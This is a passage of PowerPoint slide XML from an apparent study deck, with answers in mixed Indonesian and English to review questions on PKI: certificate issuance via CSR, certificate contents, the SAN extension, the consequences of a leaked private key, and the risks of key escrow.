            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (DV, OV, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EV). Jika valid, CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CSR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> private key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengeluarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital certificate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Step </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: Generate key pair → Buat CSR → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Validasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>2. What cryptographic information is stored in a digital certificate?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Digital certificate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Public key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>milik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subject.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (nama, domain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>CA issuer information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (nama CA).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Digital signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Validity period</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> &amp; expired).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> key usage, SAN, CRL distribution).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Fokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> public key + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subject, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh CA agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipercaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>3. What extension field is used with a web server certificate to support the identification of the server by multiple specific subdomain labels?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Subject Alternative Name (SAN)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>SAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSL/TLS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain/subdomain (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> example.com, www.example.com, mail.example.com). Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibanding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Common Name (CN).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>4. What are the potential consequences if a company loses control of a private key?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Impersonation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>peniruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyamar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Decryption of sensitive data:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TLS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>direkam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Digital signature forgery:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyerang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandatangani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> agar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resmi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Loss of trust:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Browser/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menandai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> compromised → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>reputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penjelasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Private key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sekali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bocor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicabut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (revoked).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>5. You are advising a customer about encryption for data backup security and the key escrow services that you offer. How should you explain the risks of key escrow and potential mitigations?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Key Escrow:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>Single point of failure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: Jika escrow provider </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diserang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>Misuse/abuse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: Orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (insider) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyalahgunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ID" i="1" dirty="0"/>
              <a:t>Legal/government access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
